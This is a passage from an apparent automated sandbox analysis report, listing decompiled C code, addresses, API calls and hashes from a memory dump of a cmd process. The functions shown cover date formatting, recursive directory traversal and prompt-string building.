			}

0x001b5afa
0x001b5b01
0x001b5b05
0x001b5b0b
0x001b5b11
0x001b5b17
0x001b5b24
0x001c9ae4
0x001c9aeb
0x001c9aeb
0x001c9af9
0x001b5b2a
0x001b5b31
0x001b5b45
0x001b5b45
0x001b5b59
0x001b5b6d
0x001b5b75
0x001b5b81
0x001c9bba
0x001c9bc1
0x001c9bc8
0x001c9bcf
0x001c9bdb
0x001c9be3
0x001c9be4
0x001c9be6
0x001c9be6
0x001c9bec
0x001c9bf4
0x001c9c09
0x001c9c0b
0x001c9c0d
0x001c9c0f
0x001c9c0f
0x001c9bf6
0x001c9bf6
0x001c9bf8
0x001c9bfa
0x001c9bfc
0x001c9c02
0x001c9c02
0x001c9c11
0x001c9c1a
0x001c9c4c
0x00000000
0x001c9c1c
0x001c9c24
0x001c9c2b
0x001c9c2e
0x001c9c36
0x001c9c3e
0x001c9c3f
0x001c9c44
0x001c9c51
0x001c9c51
0x001c9c57
0x001c9c58
0x001c9c59
0x001c9c62
0x001c9c67
0x001c9c6c
0x00000000
0x001c9c6c
0x001c9c30
0x00000000
0x001c9c30
0x001b5b87
0x001b5b87
0x001b5baa
0x001c9b09
0x001c9b11
0x001c9b11
0x001b5bb0
0x001b5bb7
0x001b5bbf
0x001b5bc3
0x001b5c07
0x001b5c32
0x001b5d34
0x001b5d53
0x001b5d57
0x001c9b8d
0x001c9b95
0x001c9b9f
0x001c9b9f
0x001c9ba4
0x001c9bac
0x001c9bac
0x001c9bb3
0x001b5cca
0x001b5cda
0x001b5cda
0x001b5d5d
0x001b5d68
0x001b5d6f
0x001b5d72
0x001c9ba9
0x001c9baa
0x001c9baa
0x00000000
0x001c9baa
0x001b5d7a
0x001b5d8c
0x001b5d93
0x001b5da4
0x001c9b98
0x001c9b9e
0x00000000
0x001c9b9e
0x001b5daa
0x001b5daa
0x001b5c46
0x001b5c52
0x001b5c55
0x001b5c59
0x001b5c60
0x001c9c79
0x001c9c94
0x001c9c9a
0x001c9c9b
0x001c9c96
0x001c9c96
0x001c9c97
0x001c9c97
0x001c9ca1
0x001c9c7b
0x001c9c7b
0x001c9c81
0x001c9c87
0x001c9ca9
0x001b5cc8
0x001b5cc8
0x00000000
0x001b5cc8
0x001b5c6d
0x001c9cd4
0x001b5c80
0x001b5c80
0x001b5c85
0x001b5c88
0x001b5c8c
0x001c9cb1
0x001c9cc0
0x001c9cc8
0x001b5c92
0x001b5c96
0x001b5ca5
0x001b5caa
0x001b5caa
0x001b5cb0
0x001b5cb0
0x001b5cb5
0x001b5cb8
0x001b5cba
0x001b5cba
0x001b5cbd
0x001b5cbf
0x001b5cc6
0x00000000
0x001b5cc6
0x001b5c38
0x001b5c40
0x00000000
0x00000000
0x00000000
0x001b5bc5
0x001b5bc5
0x001b5bcd
0x001b5bd0
0x001b5bd1
0x001b5bd5
0x001c9b1d
0x001c9b24
0x00000000
0x001c9b24
0x001b5bdd
0x001b5bf2
0x001b5cdd
0x001b5cdf
0x001b5ce1
0x001b5ce1
0x001b5ce3
0x001b5ce4
0x001b5ceb
0x001b5cf3
0x001b5cf9
0x001c9b2d
0x001c9b31
0x001c9b35
0x001c9b35
0x001c9b3e
0x001c9b82
0x001c9b40
0x001c9b40
0x001c9b46
0x001c9b4b
0x001c9b51
0x001c9b51
0x001c9b54
0x001c9b56
0x001c9b65
0x001c9b74
0x001c9b7a
0x001c9b7a
0x00000000
0x001c9b3e
0x001b5cff
0x001b5d01
0x001b5d04
0x001b5d04
0x001b5d07
0x001b5d09
0x001b5d23
0x001b5d29
0x001b5d2c
0x001b5d2c
0x001b5bf4
0x001b5bf4
0x001b5bf9
0x001b5bfe
0x001b5bfe
0x001b5c01
0x00000000
0x001b5c01
0x001b5bc3

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,001DF830,?,00002000), ref: 001B5B31
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001B5B45
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 001B5B59
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 001B5B6D
realloc.MSVCRT ref: 001C9C24

Part of subcall function 001C41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(001B5BA1,0000001F,?,00000080), ref: 001C41A4

GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 001B5BA2
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 001B5C2A
memmove.MSVCRT ref: 001B5D23
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 001B5D4D
realloc.MSVCRT ref: 001B5D68
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 001B5D9C

Strings

%s , xrefs: 001C9C7C
%s %s , xrefs: 001C9C9C
%02d%s%02d%s%02d, xrefs: 001C9C5B

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
String ID: %02d%s%02d%s%02d$%s $%s %s
API String ID: 2927284792-4023967598
Opcode ID: 0a24af9d76a91c22c21f42fd3ba666e31ceb76bb919e21c27c970304ad40ce46
Instruction ID: 546e79056b7e5f1b2605e00a812f363095c65e3c7306488e559e3917233ed6ec
Opcode Fuzzy Hash: 0a24af9d76a91c22c21f42fd3ba666e31ceb76bb919e21c27c970304ad40ce46
Instruction Fuzzy Hash: 48C1B671901628AFDB249F64DC49FFA77BDEB99300F1441AAE90AE7250DB31DE81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001B85EA Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 378
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E001B85EA(WCHAR* __ecx, long __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				struct _WIN32_FIND_DATAW _v1140;
				WCHAR* _v1144;
				long _v1148;
				void* _v1152;
				char _v1156;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t104;
				short _t117;
				void* _t121;
				signed int _t122;
				signed int _t124;
				WCHAR* _t126;
				void* _t127;
				void* _t130;
				WCHAR* _t136;
				intOrPtr _t139;
				WCHAR* _t140;
				WCHAR* _t144;
				intOrPtr _t147;
				WCHAR* _t151;
				WCHAR* _t153;
				WCHAR* _t158;
				WCHAR* _t159;
				long _t160;
				long _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				WCHAR* _t168;
				WCHAR* _t169;
				void* _t173;
				void* _t177;
				long _t178;
				void* _t179;
				void* _t180;
				short* _t186;
				signed int _t188;
				long _t192;
				signed int _t193;
				signed int _t194;
				intOrPtr* _t197;
				signed int _t198;
				signed int _t199;
				intOrPtr* _t203;
				signed int _t205;
				WCHAR* _t207;
				char* _t208;
				char* _t209;
				long _t214;
				signed int _t220;
				WCHAR* _t221;
				signed int _t222;
				long _t223;
				signed int _t224;
				void* _t225;
				void* _t226;
				void* _t241;
				void* _t260;

				_t217 = __edx;
				_t104 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t104 ^ _t224;
				_v24 = 1;
				_t223 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t220 = __edx;
				_t176 = __ecx;
				_v1148 = __edx;
				_v1144 = __ecx;
				memset( &_v548, 0, 0x104);
				_t226 = _t225 + 0xc;
				if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t223 = 8;
					goto L43;
				} else {
					 *_t220 = 1;
					_t221 = _t176;
					_t186 =  &(_t221[1]);
					do {
						_t117 =  *_t221;
						_t221 =  &(_t221[1]);
					} while (_t117 != 0);
					_t222 = _t221 - _t186;
					_t220 = _t222 >> 1;
					if(_t222 == 0) {
						_t223 = 0xa1;
						L43:
						__imp__??_V@YAXPAX@Z();
						return E001C6FD0(_t223, _t176, _v8 ^ _t224, _t217, _t220, _t223, _v28);
					}
					if(_t220 + 3 > 0x7fe7) {
						L42:
						_t223 = E001B8885(_t176);
						goto L43;
					}
					_t121 = FindFirstFileW(_t176,  &_v1140);
					if(_t121 == 0xffffffff) {
						_t122 = 0x10;
						_t188 = 0;
						_v1140.dwFileAttributes = _t122;
						_v1140.dwReserved0 = 0;
					} else {
						FindClose(_t121);
						_t188 = _v1140.dwReserved0;
						_t122 = _v1140.dwFileAttributes;
					}
					if((_t122 & 0x00000010) == 0) {
						goto L42;
					} else {
						if((_t122 & 0x00000400) != 0) {
							__eflags = _t188 & 0x20000000;
							if((_t188 & 0x20000000) != 0) {
								goto L42;
							}
						}
						E001C0D89(_t217, _t176);
						_t124 =  *(_t176 + _t220 * 2 - 2) & 0x0000ffff;
						if(_t124 != 0x3a && _t124 != 0x5c) {
							E001C0CF2(_t217, "\\");
							_t220 = _t220 + 1;
						}
						E001C0CF2(_t217, "*");
						_t126 = _v28;
						if(_t126 == 0) {
							_t126 =  &_v548;
						}
						_t127 = FindFirstFileW(_t126,  &_v1140);
						_v1152 = _t127;
						if(_t127 == 0xffffffff) {
							goto L42;
						} else {
							while(1) {
								L14:
								_t241 =  *0x1dd544 - _t223; // 0x0
								if(_t241 != 0) {
									break;
								}
								_t217 =  &(_v1140.cAlternateFileName);
								_t192 = _t217;
								_t177 = _t192 + 2;
								do {
									_t130 =  *_t192;
									_t192 = _t192 + 2;
								} while (_t130 != _t223);
								_t193 = _t192 - _t177;
								_t194 = _t193 >> 1;
								if(_t193 != 0) {
									L21:
									if(_t194 + _t220 >= 0x7fe7) {
										_t176 = _v1144;
										_push(_t217);
										 *_v1148 = _t223;
										E001BC5A2(_t194, 0x400023da, 2, _v1144);
										L41:
										FindClose(_v1152);
										_t260 =  *0x1dd544 - _t223; // 0x0
										if(_t260 != 0) {
											goto L43;
										}
										goto L42;
									}
									_t134 = _v28;
									if(_v28 == 0) {
										_t134 =  &_v548;
									}
									E001C1040(_t134 + _t220 * 2, _v20 - _t220, _t217);
									_t178 = _v1140.dwFileAttributes;
									if((_t178 & 0x00000010) == 0) {
										__eflags = _t178 & 0x00000001;
										if((_t178 & 0x00000001) != 0) {
											_t207 = _v28;
											__eflags = _t207;
											if(_t207 == 0) {
												_t207 =  &_v548;
											}
											_t162 = _t178 & 0xfffffffe;
											__eflags = _t162;
											SetFileAttributesW(_t207, _t162);
										}
										_t196 = _v28;
										__eflags = _v28;
										if(_v28 == 0) {
											_t196 =  &_v548;
										}
										_t217 = _t178;
										_t136 = E001B83F2(_t196, _t178);
										__eflags = _t136;
										if(_t136 == 0) {
											goto L39;
										} else {
											__eflags = _t136 - 0x4d3;
											if(_t136 == 0x4d3) {
												break;
											}
											__eflags = _t136 - 3;
											if(_t136 == 3) {
												_t158 = _v28;
												__eflags = _t158;
												if(_t158 == 0) {
													_t158 =  &_v548;
												}
												__imp___wcsnicmp(_t158, L"\\\\?\\", 4);
												_t226 = _t226 + 0xc;
												__eflags = _t158;
												if(_t158 != 0) {
													_t159 = _v28;
													__eflags = _t159;
													if(_t159 == 0) {
														_t159 =  &_v548;
													}
													_t160 = GetFullPathNameW(_t159, _t223, _t223, _t223);
													__eflags = _t160 - 0x7fe7;
													if(_t160 > 0x7fe7) {
														SetLastError(0x6f);
													}
												}
											}
											_t197 =  &(_v1140.cAlternateFileName);
											_t217 = _t197 + 2;
											do {
												_t139 =  *_t197;
												_t197 = _t197 + 2;
												__eflags = _t139 - _t223;
											} while (_t139 != _t223);
											_t140 = _v28;
											_t198 = _t197 - _t217;
											__eflags = _t198;
											_t199 = _t198 >> 1;
											if(_t198 == 0) {
												L86:
												__eflags = _t140;
												if(_t140 == 0) {
													_t140 =  &_v548;
												}
												E001BC5A2(_t199, 0x4000271b, 1, _t140);
												_t226 = _t226 + 0xc;
												L89:
												_push(_t223);
												_push(GetLastError());
												E001BC5A2(_t199);
												_t144 = _v28;
												__eflags = _t144;
												if(_t144 == 0) {
													_t144 =  &_v548;
												}
												SetFileAttributesW(_t144, _t178);
												 *_v1148 = _t223;
												goto L39;
											}
											__eflags = _t140;
											if(_t140 == 0) {
												_t140 =  &_v548;
											}
											__eflags = 0;
											_t140[_t220] = 0;
											_t203 =  &(_v1140.cFileName);
											_t217 = _t203 + 2;
											do {
												_t147 =  *_t203;
												_t203 = _t203 + 2;
												__eflags = _t147 - _t223;
											} while (_t147 != _t223);
											_t205 = _t203 - _t217 >> 1;
											_t199 =  &_v548;
											__eflags = _t205 + _t220 - 0x7fe7;
											if(_t205 + _t220 < 0x7fe7) {
												E001C0CF2(_t217,  &(_v1140.cFileName));
												_t151 = _v28;
												__eflags = _t151;
												if(_t151 == 0) {
													_t151 =  &_v548;
												}
												E001BC5A2(_t199, 0x4000271b, 1, _t151);
												_t153 = _v28;
												_t226 = _t226 + 0xc;
												__eflags = _t153;
												if(_t153 == 0) {
													_t153 =  &_v548;
												}
												_t153[_t220] = 0;
												_t199 =  &_v548;
												E001C0CF2(_t217,  &(_v1140.cAlternateFileName));
												goto L89;
											}
											E001C0CF2(_t217,  &(_v1140.cAlternateFileName));
											_t140 = _v28;
											goto L86;
										}
									} else {
										_t208 = ".";
										_t164 =  &(_v1140.cFileName);
										_t179 = 4;
										while(1) {
											_t217 =  *_t164;
											if(_t217 !=  *_t208) {
												break;
											}
											if(_t217 == 0) {
												L29:
												_t165 = _t223;
												L30:
												if(_t165 == 0) {
													L39:
													if(FindNextFileW(_v1152,  &_v1140) != 0) {
														goto L14;
													}
													goto L40;
												}
												_t209 = L"..";
												_t166 =  &(_v1140.cFileName);
												while(1) {
													_t217 =  *_t166;
													if(_t217 !=  *_t209) {
														break;
													}
													if(_t217 == 0) {
														L36:
														_t167 = _t223;
														L38:
														if(_t167 != 0) {
															_t210 = _v28;
															__eflags = _v28;
															if(_v28 == 0) {
																_t210 =  &_v548;
															}
															_t217 =  &_v1156;
															_t168 = E001B85EA(_t210,  &_v1156);
															__eflags =  *0x1dd544 - _t223; // 0x0
															if(__eflags != 0) {
																goto L40;
															} else {
																__eflags = _t168;
																if(_t168 == 0) {
																	goto L39;
																}
																_t211 = _v1148;
																 *_v1148 = _t223;
																__eflags = _t168 - 0x91;
																if(_t168 != 0x91) {
																	L58:
																	_t169 = _v28;
																	__eflags = _t169;
																	if(_t169 == 0) {
																		_t169 =  &_v548;
																	}
																	E001BC5A2(_t211, 0x4000271b, 1, _t169);
																	_t226 = _t226 + 0xc;
																	_push(_t223);
																	_push(GetLastError());
																	E001BC5A2(_t211);
																	goto L39;
																}
																__eflags = _v1156 - _t223;
																if(_v1156 == _t223) {
																	goto L39;
																}
																goto L58;
															}
														}
														goto L39;
													}
													_t217 =  *((intOrPtr*)(_t166 + 2));
													_t47 =  &(_t209[2]); // 0x2e
													if(_t217 !=  *_t47) {
														break;
													}
													_t166 = _t166 + _t179;
													_t209 =  &(_t209[_t179]);
													if(_t217 != 0) {
														continue;
													}
													goto L36;
												}
												asm("sbb eax, eax");
												_t167 = _t166 | 0x00000001;
												__eflags = _t167;
												goto L38;
											}
											_t217 =  *((intOrPtr*)(_t164 + 2));
											_t44 =  &(_t208[2]); // 0x200000
											if(_t217 !=  *_t44) {
												break;
											}
											_t164 = _t164 + _t179;
											_t208 =  &(_t208[_t179]);
											if(_t217 != 0) {
												continue;
											}
											goto L29;
										}
										asm("sbb eax, eax");
										_t165 = _t164 | 0x00000001;
										goto L30;
									}
								}
								_t217 =  &(_v1140.cFileName);
								_t214 = _t217;
								_t180 = _t214 + 2;
								do {
									_t173 =  *_t214;
									_t214 = _t214 + 2;
								} while (_t173 != _t223);
								_t194 = _t214 - _t180 >> 1;
								goto L21;
							}
							L40:
							_t176 = _v1144;
							goto L41;
						}
					}
				}
			}

0x001b85ea
0x001b85f5
0x001b85fc
0x001b8607
0x001b860c
0x001b860e
0x001b8617
0x001b861a
0x001b861c
0x001b8620
0x001b8626
0x001b862c
0x001b8639
0x001b8655
0x001b8882
0x00000000
0x001b865b
0x001b865b
0x001b8661
0x001b8663
0x001b8666
0x001b8666
0x001b8669
0x001b866c
0x001b8671
0x001b8673
0x001b8675
0x001d03bb
0x001b8859
0x001b885c
0x001b8875
0x001b8875
0x001b8683
0x001b8850
0x001b8857
0x00000000
0x001b8857
0x001b8691
0x001b869a
0x001d03c7
0x001d03c8
0x001d03ca
0x001d03d0
0x001b86a0
0x001b86a1
0x001b86a7
0x001b86ad
0x001b86ad
0x001b86b5
0x00000000
0x001b86bb
0x001b86c0
0x001d03db
0x001d03e1
0x00000000
0x00000000
0x001d03e7
0x001b86cd
0x001b86d2
0x001b86da
0x001b86ec
0x001b86f1
0x001b86f1
0x001b86fd
0x001b8702
0x001b8707
0x001d03ec
0x001d03ec
0x001b8715
0x001b871b
0x001b8724
0x00000000
0x001b872a
0x001b872a
0x001b872a
0x001b872a
0x001b8730
0x00000000
0x00000000
0x001b8736
0x001b873c
0x001b873e
0x001b8741
0x001b8741
0x001b8744
0x001b8747
0x001b874c
0x001b874e
0x001b8750
0x001b876c
0x001b8774
0x001d0615
0x001d061b
0x001d0624
0x001d0626
0x001b883b
0x001b8842
0x001b8848
0x001b884e
0x00000000
0x00000000
0x00000000
0x001b884e
0x001b877a
0x001b877f
0x001d03f7
0x001d03f7
0x001b878e
0x001b8793
0x001b879c
0x001d047a
0x001d047d
0x001d047f
0x001d0482
0x001d0484
0x001d0486
0x001d0486
0x001d048e
0x001d048e
0x001d0493
0x001d0493
0x001d0499
0x001d049c
0x001d049e
0x001d04a0
0x001d04a0
0x001d04a6
0x001d04a8
0x001d04ad
0x001d04af
0x00000000
0x001d04b5
0x001d04b5
0x001d04ba
0x00000000
0x00000000
0x001d04c0
0x001d04c3
0x001d04c5
0x001d04c8
0x001d04ca
0x001d04cc
0x001d04cc
0x001d04da
0x001d04e0
0x001d04e3
0x001d04e5
0x001d04e7
0x001d04ea
0x001d04ec
0x001d04ee
0x001d04ee
0x001d04f8
0x001d04fe
0x001d0503
0x001d0507
0x001d0507
0x001d0503
0x001d04e5
0x001d050d
0x001d0513
0x001d0516
0x001d0516
0x001d0519
0x001d051c
0x001d051c
0x001d0521
0x001d0524
0x001d0524
0x001d0526
0x001d0528
0x001d0571
0x001d0571
0x001d0573
0x001d0575
0x001d0575
0x001d0583
0x001d0588
0x001d058b
0x001d058b
0x001d0592
0x001d0593
0x001d0598
0x001d059d
0x001d059f
0x001d05a1
0x001d05a1
0x001d05a9
0x001d05b5
0x00000000
0x001d05b5
0x001d052a
0x001d052c
0x001d052e
0x001d052e
0x001d0534
0x001d0536
0x001d053a
0x001d0540
0x001d0543
0x001d0543
0x001d0546
0x001d0549
0x001d0549
0x001d0550
0x001d0555
0x001d055b
0x001d0560
0x001d05c3
0x001d05c8
0x001d05cb
0x001d05cd
0x001d05cf
0x001d05cf
0x001d05dd
0x001d05e2
0x001d05e5
0x001d05e8
0x001d05ea
0x001d05ec
0x001d05ec
0x001d05f4
0x001d05ff
0x001d0605
0x00000000
0x001d0605
0x001d0569
0x001d056e
0x00000000
0x001d056e
0x001b87a2
0x001b87a4
0x001b87a9
0x001b87af
0x001b87b0
0x001b87b0
0x001b87b6
0x00000000
0x00000000
0x001b87bf
0x001b87d8
0x001b87d8
0x001b87da
0x001b87dc
0x001b881a
0x001b882f
0x00000000
0x00000000
0x00000000
0x001b882f
0x001b87de
0x001b87e3
0x001b87e9
0x001b87e9
0x001b87ef
0x00000000
0x00000000
0x001b87f4
0x001b8809
0x001b8809
0x001b8812
0x001b8814
0x001d0402
0x001d0405
0x001d0407
0x001d0409
0x001d0409
0x001d040f
0x001d0415
0x001d041a
0x001d0420
0x00000000
0x001d0426
0x001d0426
0x001d0428
0x00000000
0x00000000
0x001d042e
0x001d0434
0x001d0436
0x001d043b
0x001d0449
0x001d0449
0x001d044c
0x001d044e
0x001d0450
0x001d0450
0x001d045e
0x001d0463
0x001d0466
0x001d046d
0x001d046e
0x00000000
0x001d0474
0x001d043d
0x001d0443
0x00000000
0x00000000
0x00000000
0x001d0443
0x001d0420
0x00000000
0x001b8814
0x001b87f6
0x001b87fa
0x001b87fe
0x00000000
0x00000000
0x001b8800
0x001b8802
0x001b8807
0x00000000
0x00000000
0x00000000
0x001b8807
0x001b880d
0x001b880f
0x001b880f
0x00000000
0x001b880f
0x001b87c1
0x001b87c5
0x001b87c9
0x00000000
0x00000000
0x001b87cf
0x001b87d1
0x001b87d6
0x00000000
0x00000000
0x00000000
0x001b87d6
0x001b8876
0x001b8878
0x00000000
0x001b8878
0x001b879c
0x001b8752
0x001b8758
0x001b875a
0x001b875d
0x001b875d
0x001b8760
0x001b8763
0x001b876a
0x00000000
0x001b876a
0x001b8835
0x001b8835
0x00000000
0x001b8835
0x001b8724
0x001b86b5

APIs

memset.MSVCRT ref: 001B862C

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000105), ref: 001B8691
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105), ref: 001B86A1
FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,001B250C,?,?,?,-00000105), ref: 001B8715
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000105), ref: 001B8827
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 001B8842
??_V@YAXPAX@Z.MSVCRT ref: 001B885C

Strings

\\?\, xrefs: 001D04D4

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Find$File$CloseFirstmemset$Next
String ID: \\?\
API String ID: 3059144641-4282027825
Opcode ID: 5089aad066996cd3d81b2a33376d8c975693e6fee1b49e44abec6f7bd5213dbb
Instruction ID: bcadbf5c3f8b9fa787cbcab6e91c299f564ca6a2a06d74b9c56ae074acad6378
Opcode Fuzzy Hash: 5089aad066996cd3d81b2a33376d8c975693e6fee1b49e44abec6f7bd5213dbb
Instruction Fuzzy Hash: B8D1B171A001199BDF25EB64DC85BFA7379EF28704F5405AAEA09D7241EB30DE85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D6FF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E001D6FF0(void* __ecx) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v36;
				signed int _v48;
				void _v50;
				void _v52;
				void _v54;
				short _v56;
				char _v124;
				char _v644;
				void* _v648;
				void* _v652;
				signed int _v656;
				signed short* _v660;
				signed short* _v664;
				WCHAR* _v668;
				signed int _v672;
				void* _v676;
				char _v680;
				char _v684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t111;
				signed int _t112;
				intOrPtr _t119;
				void _t121;
				signed short _t122;
				signed int _t125;
				signed int _t126;
				void _t131;
				void _t136;
				intOrPtr* _t138;
				void _t142;
				signed int _t153;
				signed short* _t163;
				intOrPtr* _t164;
				void* _t167;
				signed short* _t173;
				signed int _t174;
				void* _t184;
				signed int _t187;
				void* _t188;
				signed int _t189;
				signed int _t190;
				void* _t191;
				signed int _t193;
				void* _t196;
				void* _t199;
				signed short* _t200;
				void* _t201;
				intOrPtr* _t202;
				signed int _t204;
				void* _t207;
				void* _t209;
				void* _t210;
				void* _t211;
				signed short* _t213;
				void* _t214;
				signed int _t219;
				signed int _t221;
				intOrPtr _t222;
				signed int _t226;
				intOrPtr _t227;
				intOrPtr _t228;

				_t153 = _t219;
				_push(__ecx);
				_push(__ecx);
				_t221 = (_t219 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				_t217 = _t221;
				_push(0xfffffffe);
				_push(0x1dc140);
				_push(E001C7290);
				_push( *[fs:0x0]);
				_push(__ecx);
				_push(__ecx);
				_push(_t153);
				_t222 = _t221 - 0x288;
				_t111 =  *0x1dd0b4; // 0xea614d48
				_v20 = _v20 ^ _t111;
				_t112 = _t111 ^ _t221;
				_v48 = _t112;
				_push(_t112);
				_t113 =  &_v28;
				 *[fs:0x0] =  &_v28;
				_v36 = _t222;
				_v672 = 0;
				_t226 =  *0x1dd544; // 0x0
				if(_t226 != 0) {
					_push(0);
					_push(0x2335);
					_t113 = E001BC108(__ecx);
					EnterCriticalSection( *0x1e3858);
					 *0x1dd544 = 0;
					LeaveCriticalSection( *0x1e3858);
				}
				_t227 =  *0x1dd0c8; // 0x1
				if(_t227 == 0) {
					L96:
					 *[fs:0x0] = _v28;
					_pop(_t199);
					_pop(_t207);
					return E001C6FD0(_t113, _t153, _v48 ^ _t217, _t182, _t199, _t207);
				} else {
					_t228 =  *0x1dd5c8; // 0x0
					if(_t228 == 0) {
						E001C25D9(L"\r\n");
					}
					if( *0x1e7896 == 0) {
						_t200 = E001BCFBC(L"PROMPT");
						_v660 = _t200;
						if(_t200 != 0) {
							_v660 = 0x1f8110;
							E001C1040(0x1f8110, 0x200, _t200);
							 *0x1e7896 = 1;
						}
					} else {
						_v660 = 0x1f8110;
					}
					_t160 =  *0x1f3cb8;
					if( *0x1f3cb8 == 0) {
						_t160 = 0x1f3ab0;
					}
					_t182 =  *0x1f3cc0;
					E001C36CB(_t153, _t160,  *0x1f3cc0, 0);
					_t113 = E001D6FA6( &_v680);
					_v676 = _t113;
					if(_t113 == 0) {
						goto L96;
					} else {
						_t201 = _t113;
						_v652 = _t201;
						 *_t113 = 0;
						_t209 = _v680 - 1;
						_v648 = _t209;
						_t163 = _v660;
						if(_t163 == 0) {
							L86:
							_t117 =  *0x1f3cb8;
							if( *0x1f3cb8 == 0) {
								_t117 = 0x1f3ab0;
							}
							_t202 = _v676;
							E001C274C(_t202, _t209, L"%s>", _t117);
							_t164 = _t202;
							_t103 = _t164 + 2; // 0x2
							_t210 = _t103;
							do {
								_t119 =  *_t164;
								_t164 = _t164 + 2;
							} while (_t119 != 0);
							_t201 = _t202 + (_t164 - _t210 >> 1) * 2;
							L91:
							_t167 = 0;
							L92:
							 *_t201 = 0;
							_t203 = _v676;
							_t184 = _v676;
							_t107 = _t184 + 2; // 0x2
							_t211 = _t107;
							do {
								_t121 =  *_t184;
								_t184 = _t184 + 2;
							} while (_t121 != _t167);
							_t182 = _t184 - _t211 >> 1;
							_t113 = E001C2616(_t203, _t184 - _t211 >> 1);
							if( *0x1dd544 != 0) {
								EnterCriticalSection( *0x1e3858);
								 *0x1dd544 =  *0x1dd544 & 0x00000000;
								LeaveCriticalSection( *0x1e3858);
							}
							goto L96;
						}
						_t122 =  *_t163 & 0x0000ffff;
						if(_t122 == 0) {
							goto L86;
						}
						L14:
						while(_t122 != 0) {
							if(_t122 == 0x24) {
								_t213 =  &(_v660[1]);
								_v660 = _t213;
								_v664 = _t213;
								_t204 = 0;
								_v656 = 0x1b3b90;
								while(towupper( *_t213 & 0x0000ffff) !=  *_v656) {
									_t204 = _t204 + 1;
									_t35 = 0x1b3b90 + _t204 * 6; // 0x30050
									_t138 = _t35;
									_v656 = _t138;
									_t167 = 0;
									if( *_t138 != 0) {
										continue;
									}
									L28:
									_t125 = _t204 * 6;
									_t201 = _v652;
									_t214 = _v648;
									if( *((intOrPtr*)(_t125 + 0x1b3b90)) == _t167) {
										goto L92;
									}
									_t40 = _t125 + 0x1b3b92; // 0x3
									_t187 =  *_t40 & 0x0000ffff;
									if(_t187 != 8) {
										_t45 = _t187 - 1; // 0x2
										_t126 = _t45;
										if(_t126 > 9) {
											L78:
											_t127 =  *0x1f3cb8;
											if( *0x1f3cb8 == 0) {
												_t127 = 0x1f3ab0;
											}
											E001C274C(_t201, _t214, L"%c",  *_t127 & 0x0000ffff);
											_t222 = _t222 + 0x10;
											_t188 = _t201;
											_v664 = _t188 + 2;
											do {
												_t131 =  *_t188;
												_t188 = _t188 + 2;
											} while (_t131 != 0);
											_t189 = _t188 - _v664;
											L83:
											_t190 = _t189 >> 1;
											_t209 = _t214 - _t190;
											_t201 = _t201 + _t190 * 2;
											L84:
											_v648 = _t209;
											_v652 = _t201;
											L85:
											_t173 =  &(_v660[1]);
											_v660 = _t173;
											_t122 =  *_t173 & 0x0000ffff;
											goto L14;
										}
										switch( *((intOrPtr*)(_t126 * 4 +  &M001D7698))) {
											case 0:
												_t132 = E001B96A0(0, 1, _t201, _t214);
												goto L36;
											case 1:
												__edx = 0;
												__edx = 1;
												__ecx = 0;
												__eax = E001B5AEF(0, 1, __edi, __esi);
												L36:
												_t201 = _t201 + _t132 * 2;
												_t209 = _t214 - _t132;
												goto L84;
											case 2:
												__eax =  *0x1f3cb8;
												if( *0x1f3cb8 == 0) {
													__eax = 0x1f3ab0;
												}
